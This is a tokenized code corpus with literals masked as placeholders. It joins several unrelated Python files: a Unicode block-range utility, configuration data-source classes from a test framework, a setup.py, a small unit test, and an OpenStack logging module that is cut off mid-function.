<NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ideographic_description_characters ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_symbols_and_punctuation ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hiragana ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . katakana ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . bopomofo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hangul_compatibility_jamo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . kanbun_kunten ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . bopomofo_extended ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . katakana_phonetic_extensions ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . enclosed_cjk_letters_and_months ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_compatibility ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_unified_ideographs_extension_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . yijing_hexagram_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_unified_ideographs ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . yi_syllables ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . yi_radicals ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hangul_syllables ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . high_surrogate_area ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . low_surrogate_area ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . private_use_area ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_compatibility_ideographs ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . alphabetic_presentation_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arabic_presentation_forms_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . variation_selectors ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . combining_half_marks ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_compatibility_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . small_form_variants ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arabic_presentation_forms_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . halfwidth_and_fullwidth_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . specials ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . linear_b_syllabary ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . linear_b_ideograms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . aegean_numbers ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . old_italic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . gothic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ugaritic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . deseret ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . shavian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . osmanya ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cypriot_syllabary ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . byzantine_musical_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . musical_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tai_xuan_jing_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . mathematical_alphanumeric_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_unified_ideographs_extension_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <EOL> BLOCK_NAMES . cjk_compatibility_ideographs_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tags ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . variation_selectors_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplementary_private_use_area_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . unused ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplementary_private_use_area_b ) ) <EOL> class UnicodeRange ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , start , end , name ) : <EOL> self . name = name <EOL> self . start = start <EOL> self . end = end <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> hex ( self . start ) , hex ( self . end ) , str ( self . name ) ) <EOL> def codepoints ( self ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in range ( self . start , self . end + <NUM_LIT:1> ) : <EOL> yield codepoint <EOL> def codepoint_names ( self ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield codepoint_name ( codepoint ) <EOL> def encoded_codepoints ( self , encoding = '<STR_LIT:utf-8>' ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield six . unichr ( codepoint ) . encode ( encoding ) <EOL> class UnicodeRangeList ( list ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> ret_str = '<STR_LIT:[>' <EOL> for unicode_range in self : <EOL> ret_str = '<STR_LIT>' . format ( ret_str , str ( unicode_range ) ) <EOL> return '<STR_LIT>' . format ( ret_str ) <EOL> def codepoints ( self ) : <EOL> """<STR_LIT>""" <EOL> for unicode_range in self : <EOL> for codepoint in unicode_range . codepoints ( ) : <EOL> yield codepoint <EOL> def codepoint_names ( self ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield codepoint_name ( codepoint ) <EOL> def encoded_codepoints ( self , encoding = '<STR_LIT:utf-8>' ) : <EOL> """<STR_LIT>""" <EOL> for codepoint in self . codepoints ( ) : <EOL> yield six . unichr ( codepoint ) . encode ( encoding ) <EOL> def get_range ( self , range_name ) : <EOL> """<STR_LIT>""" <EOL> for unicode_range in self : <EOL> if unicode_range . name == range_name : <EOL> return unicode_range <EOL> def get_range_list ( self , range_name_list ) : <EOL> """<STR_LIT>""" <EOL> range_list = UnicodeRangeList ( ) <EOL> for unicode_range in self : <EOL> if unicode_range . name in range_name_list : <EOL> range_list . append ( unicode_range ) <EOL> return range_list <EOL> UNICODE_BLOCKS = UnicodeRangeList ( ) <EOL> for _start , _end , _name in _unicode_blocks : <EOL> UNICODE_BLOCKS . append ( UnicodeRange ( _start , _end , _name ) ) <EOL> UNICODE_PLANES = UnicodeRangeList ( ) <EOL> for _start , _end , _name in _unicode_planes : <EOL> UNICODE_PLANES . append ( UnicodeRange ( _start , _end , _name ) ) <EOL> def codepoint_parent_plane ( codepoint_integer ) : <EOL> """<STR_LIT>""" <EOL> for plane in UNICODE_PLANES : <EOL> if codepoint_integer >= plane . start and codepoint_integer <= plane . end : <EOL> return plane <EOL> def codepoint_parent_block ( codepoint_integer ) : <EOL> """<STR_LIT>""" <EOL> for block in UNICODE_BLOCKS : <EOL> if codepoint_integer >= block . start and codepoint_integer <= block . end : <EOL> return block <EOL> def codepoint_name ( codepoint_integer ) : <EOL> """<STR_LIT>""" <EOL> if ( codepoint_integer < UNICODE_STARTING_CODEPOINT ) or ( codepoint_integer > ( UNICODE_ENDING_CODEPOINT + <NUM_LIT:1> ) ) : <EOL> return None <EOL> return unicodedata . name ( <EOL> six . unichr ( codepoint_integer ) , hex ( codepoint_integer ) ) </s>
<s> import abc <EOL> import json <EOL> import os <EOL> from six . moves import configparser <EOL> from six import add_metaclass <EOL> from cafe . common . reporting import cclogging <EOL> try : <EOL> from cafe . engine . mongo . client import BaseMongoClient <EOL> except : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ConfigDataException ( Exception ) : <EOL> pass <EOL> class NonExistentConfigPathError ( Exception ) : <EOL> pass <EOL> class ConfigEnvironmentVariableError ( Exception ) : <EOL> pass <EOL> def expected_values ( * values ) : <EOL> def decorator ( fn ) : <EOL> def wrapped ( ) : <EOL> class UnexpectedConfigOptionValueError ( Exception ) : <EOL> pass <EOL> value = fn ( ) <EOL> if value not in values : <EOL> raise UnexpectedConfigOptionValueError ( value ) <EOL> return fn ( ) <EOL> return wrapped <EOL> return decorator <EOL> def _get_path_from_env ( os_env_var ) : <EOL> try : <EOL> return os . environ [ os_env_var ] <EOL> except KeyError : <EOL> msg = "<STR_LIT>" . format ( <EOL> os_env_var ) <EOL> raise ConfigEnvironmentVariableError ( msg ) <EOL> except Exception as exception : <EOL> print ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( os_env_var ) ) <EOL> raise exception <EOL> CONFIG_KEY = '<STR_LIT>' <EOL> @ add_metaclass ( abc . ABCMeta ) <EOL> class DataSource ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _log = cclogging . logging . getLogger ( <EOL> cclogging . get_object_namespace ( self . __class__ ) ) <EOL> def get ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> def get_raw ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> def get_json ( self , item_name , default = None ) : <EOL> raise NotImplementedError <EOL> @ staticmethod <EOL> def _str_to_bool ( value ) : <EOL> """<STR_LIT>""" <EOL> if value : <EOL> return value . lower ( ) == '<STR_LIT:true>' <EOL> return None <EOL> @ staticmethod <EOL> def _parse_json ( value , log = None ) : <EOL> """<STR_LIT>""" <EOL> if not value : <EOL> return None <EOL> try : <EOL> return json . loads ( value ) <EOL> except ValueError as error : <EOL> if log is not None : <EOL> log . warning ( "<STR_LIT>" <EOL> . format ( value , error ) ) <EOL> return None <EOL> class EnvironmentVariableDataSource ( DataSource ) : <EOL> def __init__ ( self , section_name ) : <EOL> super ( EnvironmentVariableDataSource , self ) . __init__ ( ) <EOL> self . _section_name = section_name <EOL> def get ( self , item_name , default = None ) : <EOL> return os . environ . get ( CONFIG_KEY . format ( <EOL> section_name = self . _section_name , key = item_name ) , default ) <EOL> def get_raw ( self , item_name , default = None ) : <EOL> return self . get ( item_name , default ) <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> return self . _str_to_bool ( self . get ( item_name , default ) ) <EOL> def get_json ( self , item_name , default = None ) : <EOL> return self . _parse_json ( self . get ( item_name , default ) , log = self . _log ) <EOL> class ConfigParserDataSource ( DataSource ) : <EOL> def __init__ ( self , config_file_path , section_name ) : <EOL> super ( ConfigParserDataSource , self ) . __init__ ( ) <EOL> cafe_env_var = { key : value for key , value in os . environ . iteritems ( ) <EOL> if key . startswith ( '<STR_LIT>' ) } <EOL> self . _data_source = configparser . SafeConfigParser ( <EOL> defaults = cafe_env_var ) <EOL> self . _section_name = section_name <EOL> if not os . path . exists ( config_file_path ) : <EOL> msg = '<STR_LIT>' . format ( config_file_path ) <EOL> raise NonExistentConfigPathError ( msg ) <EOL> try : <EOL> self . _data_source . read ( config_file_path ) <EOL> except Exception as exception : <EOL> self . _log . exception ( exception ) <EOL> raise exception <EOL> def get ( self , item_name , default = None ) : <EOL> try : <EOL> return self . _data_source . get ( self . _section_name , item_name ) <EOL> except ( configparser . NoOptionError , configparser . NoSectionError ) as e : <EOL> if default is None : <EOL> self . _log . error ( str ( e ) ) <EOL> else : <EOL> msg = "<STR_LIT>" . format ( <EOL> str ( e ) , default ) <EOL> self . _log . warning ( msg ) <EOL> return default <EOL> def get_raw ( self , item_name , default = None ) : <EOL> try : <EOL> return self . _data_source . get ( <EOL> self . _section_name , item_name , raw = True ) <EOL> except ( configparser . NoOptionError , configparser . NoSectionError ) as e : <EOL> if default is None : <EOL> self . _log . error ( str ( e ) ) <EOL> else : <EOL> msg = "<STR_LIT>" . format ( <EOL> str ( e ) , default ) <EOL> self . _log . warning ( msg ) <EOL> return default <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> try : <EOL> return self . _data_source . getboolean ( self . _section_name , item_name ) <EOL> except ( configparser . NoOptionError , configparser . NoSectionError ) as e : <EOL> if default is None : <EOL> self . _log . error ( str ( e ) ) <EOL> else : <EOL> msg = "<STR_LIT>" . format ( <EOL> str ( e ) , default ) <EOL> self . _log . warning ( msg ) <EOL> return default <EOL> def get_json ( self , item_name , default = None ) : <EOL> value = self . _parse_json ( self . get ( item_name , None ) , log = self . _log ) <EOL> if value is None : <EOL> return default <EOL> return value <EOL> class DictionaryDataSource ( DataSource ) : <EOL> def get ( self , item_name , default = None ) : <EOL> section = self . _data_source . get ( self . _section_name ) <EOL> if section is None : <EOL> self . _log . error ( "<STR_LIT>" . format ( <EOL> section_name = self . _section_name ) ) <EOL> return None <EOL> if item_name not in section : <EOL> self . _log . error ( <EOL> "<STR_LIT>" . format ( <EOL> section_name = self . _section_name , item_name = item_name ) ) <EOL> return default <EOL> return section . get ( item_name , default ) <EOL> def get_raw ( self , item_name , default = None ) : <EOL> section = self . _data_source . get ( self . _section_name ) <EOL> if section is None : <EOL> self . _log . error ( "<STR_LIT>" . format ( <EOL> section_name = self . _section_name ) ) <EOL> return None <EOL> if item_name not in section : <EOL> self . _log . error ( <EOL> "<STR_LIT>" . format ( <EOL> section_name = self . _section_name , item_name = item_name ) ) <EOL> return default <EOL> return section . get ( item_name , default ) <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> section = self . _data_source . get ( self . _section_name ) <EOL> if section is None : <EOL> self . _log . error ( "<STR_LIT>" . format ( <EOL> section_name = self . _section_name ) ) <EOL> return None <EOL> if item_name not in section : <EOL> self . _log . error ( <EOL> "<STR_LIT>" . format ( <EOL> section_name = self . _section_name , item_name = item_name ) ) <EOL> return default <EOL> return self . _str_to_bool ( self . get ( item_name , default ) ) <EOL> def get_json ( self , item_name , default = None ) : <EOL> value = self . _parse_json ( self . get ( item_name , None ) , log = self . _log ) <EOL> if value is None : <EOL> return default <EOL> return value <EOL> class JSONDataSource ( DictionaryDataSource ) : <EOL> def __init__ ( self , config_file_path , section_name ) : <EOL> super ( JSONDataSource , self ) . __init__ ( ) <EOL> self . _section_name = section_name <EOL> if not os . path . exists ( config_file_path ) : <EOL> msg = '<STR_LIT>' . format ( config_file_path ) <EOL> raise NonExistentConfigPathError ( msg ) <EOL> with open ( config_file_path ) as config_file : <EOL> config_data = config_file . read ( ) <EOL> try : <EOL> self . _data_source = json . loads ( config_data ) <EOL> except Exception as exception : <EOL> self . _log . exception ( exception ) <EOL> raise exception <EOL> class MongoDataSource ( DictionaryDataSource ) : <EOL> def __init__ ( <EOL> self , hostname , db_name , username , password , config_name , <EOL> section_name ) : <EOL> super ( MongoDataSource , self ) . __init__ ( ) <EOL> self . _section_name = section_name <EOL> self . db = BaseMongoClient ( <EOL> hostname = hostname , db_name = db_name , <EOL> username = username , password = password ) <EOL> self . db . connect ( ) <EOL> self . db . auth ( ) <EOL> self . _data_source = self . db . find_one ( { '<STR_LIT>' : config_name } ) <EOL> class BaseConfigSectionInterface ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config_file_path , section_name ) : <EOL> self . _log = cclogging . logging . getLogger ( <EOL> cclogging . get_object_namespace ( self . __class__ ) ) <EOL> self . _override = EnvironmentVariableDataSource ( <EOL> section_name ) <EOL> self . _data_source = ConfigParserDataSource ( <EOL> config_file_path , section_name ) <EOL> self . _section_name = section_name <EOL> def get ( self , item_name , default = None ) : <EOL> return self . _override . get ( item_name , None ) or self . _data_source . get ( item_name , default ) <EOL> def get_raw ( self , item_name , default = None ) : <EOL> return self . _override . get_raw ( item_name , None ) or self . _data_source . get_raw ( item_name , default ) <EOL> def get_boolean ( self , item_name , default = None ) : <EOL> value = self . _override . get_boolean ( item_name , None ) <EOL> if value is None : <EOL> value = self . _data_source . get_boolean ( item_name , default ) <EOL> return value <EOL> def get_json ( self , item_name , default = None ) : <EOL> value = self . _override . get_json ( item_name , None ) <EOL> if value is None : <EOL> value = self . _data_source . get_json ( item_name , default ) <EOL> return value <EOL> class ConfigSectionInterface ( BaseConfigSectionInterface ) : <EOL> def __init__ ( self , config_file_path = None , section_name = None ) : <EOL> section_name = ( section_name or <EOL> getattr ( self , '<STR_LIT>' , None ) or <EOL> getattr ( self , '<STR_LIT>' , None ) ) <EOL> config_file_path = config_file_path or _get_path_from_env ( <EOL> '<STR_LIT>' ) <EOL> super ( ConfigSectionInterface , self ) . __init__ ( <EOL> config_file_path , section_name ) </s>
<s> from setuptools import setup , find_packages <EOL> import sys <EOL> from setuptools . command . test import test as TestCommand <EOL> class Tox ( TestCommand ) : <EOL> def finalize_options ( self ) : <EOL> TestCommand . finalize_options ( self ) <EOL> self . test_args = [ ] <EOL> self . test_suite = True <EOL> def run_tests ( self ) : <EOL> import tox <EOL> errno = tox . cmdline ( self . test_args ) <EOL> sys . exit ( errno ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> namespace_packages = [ '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> cmdclass = { '<STR_LIT:test>' : Tox } , <EOL> zip_safe = False ) </s>
<s> import unittest <EOL> from cafe . drivers . unittest import decorators <EOL> class DSLSuiteBuilderTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_FauxDSLFixture_raises_Exception ( self ) : <EOL> """<STR_LIT>""" <EOL> faux_fixture = type ( <EOL> '<STR_LIT>' , <EOL> ( object , ) , <EOL> dict ( decorators . _FauxDSLFixture . __dict__ ) ) <EOL> with self . assertRaises ( decorators . EmptyDSLError ) as e : <EOL> faux_fixture ( ) . setUpClass ( ) <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEquals ( msg , e . exception . message ) </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import itertools <EOL> import logging <EOL> import logging . config <EOL> import logging . handlers <EOL> import os <EOL> import sys <EOL> import traceback <EOL> from oslo_config import cfg <EOL> import six <EOL> from six import moves <EOL> _PY26 = sys . version_info [ <NUM_LIT:0> : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:6> ) <EOL> from os_doc_tools . openstack . common . gettextutils import _ <EOL> from os_doc_tools . openstack . common import importutils <EOL> from os_doc_tools . openstack . common import jsonutils <EOL> from os_doc_tools . openstack . common import local <EOL> from os_doc_tools . openstack . common . strutils import mask_password <EOL> _DEFAULT_LOG_DATE_FORMAT = "<STR_LIT>" <EOL> common_cli_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> short = '<STR_LIT:d>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> short = '<STR_LIT:v>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> logging_cli_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> deprecated_name = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = _DEFAULT_LOG_DATE_FORMAT , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> deprecated_name = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> deprecated_name = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> ] <EOL> generic_log_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = True , <EOL> help = '<STR_LIT>' ) <EOL> ] <EOL> DEFAULT_LOG_LEVELS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> log_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . ListOpt ( '<STR_LIT>' , <EOL> default = DEFAULT_LOG_LEVELS , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_cli_opts ( common_cli_opts ) <EOL> CONF . register_cli_opts ( logging_cli_opts ) <EOL> CONF . register_opts ( generic_log_opts ) <EOL> CONF . register_opts ( log_opts ) <EOL> logging . AUDIT = logging . INFO + <NUM_LIT:1> <EOL> logging . addLevelName ( logging . AUDIT , '<STR_LIT>' ) <EOL> try : <EOL> NullHandler = logging . NullHandler <EOL> except AttributeError : <EOL> class NullHandler ( logging . Handler ) : <EOL> def handle ( self , record ) : <EOL> pass <EOL> def emit ( self , record ) : <EOL> pass <EOL> def createLock ( self ) : <EOL> self . lock = None <EOL> def _dictify_context ( context ) : <EOL> if context is None : <EOL> return None <EOL> if not isinstance ( context , dict ) and getattr ( context , '<STR_LIT>' , None ) : <EOL> context = context . to_dict ( ) <EOL> return context <EOL> def _get_binary_name ( ) : <EOL> return os . path . basename ( inspect . stack ( ) [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> def _get_log_file_path ( binary = None ) : <EOL> logfile = CONF . log_file <EOL> logdir = CONF . log_dir <EOL> if logfile and not logdir : <EOL> return logfile <EOL> if logfile and logdir : <EOL> return os . path . join ( logdir , logfile ) <EOL> if logdir : <EOL> binary = binary or _get_binary_name ( ) <EOL> return '<STR_LIT>' % ( os . path . join ( logdir , binary ) , ) <EOL> return None <EOL> class BaseLoggerAdapter ( logging . LoggerAdapter ) : <EOL> def audit ( self , msg , * args , ** kwargs ) : <EOL> self . log ( logging . AUDIT , msg , * args , ** kwargs ) <EOL> def isEnabledFor ( self , level ) : <EOL> if _PY26 : <EOL> return self . logger . isEnabledFor ( level ) <EOL> else : <EOL> return super ( BaseLoggerAdapter , self ) . isEnabledFor ( level ) <EOL> class LazyAdapter ( BaseLoggerAdapter ) : <EOL> def __init__ ( self , name = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> self . _logger = None <EOL> self . extra = { } <EOL> self . name = name <EOL> self . version = version <EOL> @ property <EOL> def logger ( self ) : <EOL> if not self . _logger : <EOL> self . _logger = getLogger ( self . name , self . version ) <EOL> if six . PY3 : <EOL> self . _logger . manager = self . _logger . logger . manager <EOL> return self . _logger <EOL> class ContextAdapter ( BaseLoggerAdapter ) : <EOL> warn = logging . LoggerAdapter . warning <EOL> def __init__ ( self , logger , project_name , version_string ) : <EOL> self . logger = logger <EOL> self . project = project_name <EOL> self . version = version_string <EOL> self . _deprecated_messages_sent = dict ( ) <EOL> @ property <EOL> def handlers ( self ) : <EOL> return self . logger . handlers <EOL> def deprecated ( self , msg , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> stdmsg = _ ( "<STR_LIT>" ) % msg <EOL> if CONF . fatal_deprecations : <EOL> self . critical ( stdmsg , * args , ** kwargs ) <EOL> raise DeprecatedConfig ( msg = stdmsg ) <EOL> sent_args = self . _deprecated_messages_sent . setdefault ( msg , list ( ) ) <EOL> if args in sent_args : <EOL> return <EOL> sent_args . append ( args ) <EOL> self . warn ( stdmsg , * args , ** kwargs ) <EOL> def process ( self , msg , kwargs ) : <EOL> if not isinstance ( msg , six . string_types ) : <EOL> msg = six . text_type ( msg ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = { } <EOL> extra = kwargs [ '<STR_LIT>' ] <EOL> context = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if not context : <EOL> context = getattr ( local . store , '<STR_LIT>' , None ) <EOL> if context : <EOL> extra . update ( _dictify_context ( context ) ) <EOL> instance = kwargs . pop ( '<STR_LIT>' , None ) <EOL> instance_uuid = ( extra . get ( '<STR_LIT>' ) or <EOL> kwargs . pop ( '<STR_LIT>' , None ) ) <EOL> instance_extra = '<STR_LIT>' <EOL> if instance : <EOL> instance_extra = CONF . instance_format % instance <EOL> elif instance_uuid : <EOL> instance_extra = ( CONF . instance_uuid_format <EOL> % { '<STR_LIT>' : instance_uuid } ) <EOL> extra [ '<STR_LIT>' ] = instance_extra <EOL> extra . setdefault ( '<STR_LIT>' , kwargs . pop ( '<STR_LIT>' , None ) ) <EOL> extra [ '<STR_LIT>' ] = self . project <EOL> extra [ '<STR_LIT:version>' ] = self . version <EOL> extra [ '<STR_LIT>' ] = extra . copy ( ) <EOL> return msg , kwargs <EOL> class JSONFormatter ( logging . Formatter ) : <EOL> def __init__ ( self , fmt = None , datefmt = None ) : <EOL> self . datefmt = datefmt <EOL> def formatException ( self , ei , strip_newlines = True ) : <EOL> lines = traceback . format_exception ( * ei ) <EOL> if strip_newlines : <EOL> lines = [ moves . filter ( <EOL> lambda x : x , <EOL> line . rstrip ( ) . splitlines ( ) ) for line in lines ] <EOL> lines = list ( itertools . chain ( * lines ) ) <EOL> return lines <EOL> def format ( self , record ) : <EOL> message = { '<STR_LIT:message>' : record . getMessage ( ) , <EOL> '<STR_LIT>' : self . formatTime ( record , self . datefmt ) , <EOL> '<STR_LIT:name>' : record . name , <EOL> '<STR_LIT>' : record . msg 